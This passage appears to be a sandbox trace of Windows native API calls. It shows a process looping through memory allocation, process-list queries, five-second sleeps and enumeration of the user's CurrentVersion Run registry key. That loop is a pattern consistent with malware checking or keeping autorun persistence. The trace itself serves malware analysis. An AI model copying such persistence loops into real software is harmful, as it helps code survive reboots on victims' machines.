RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.641] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.661] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.661] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.661] NtClose (Handle=0x154) returned 0x0 [0187.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.665] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.669] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.669] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.669] NtClose (Handle=0x154) returned 0x0 [0187.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.684] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.684] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.684] NtClose (Handle=0x154) returned 0x0 [0187.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.688] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.700] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.700] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.700] NtClose (Handle=0x154) returned 0x0 [0187.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.715] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.715] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.715] NtClose (Handle=0x154) returned 0x0 [0187.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.719] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.731] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.731] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.731] NtClose (Handle=0x154) returned 0x0 [0187.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.738] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.746] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.746] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.746] NtClose (Handle=0x154) returned 0x0 [0187.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.763] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.763] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.763] NtClose (Handle=0x154) returned 0x0 [0187.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.767] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.777] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.778] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.778] NtClose (Handle=0x154) returned 0x0 [0187.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.793] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.794] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.794] NtClose (Handle=0x154) returned 0x0 [0187.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.799] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.809] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.809] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.809] NtClose (Handle=0x154) returned 0x0 [0187.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.812] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.824] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.825] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.825] NtClose (Handle=0x154) returned 0x0 [0187.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.830] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.840] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.840] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.840] NtClose (Handle=0x154) returned 0x0 [0187.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.844] NtFreeVirtualMemory 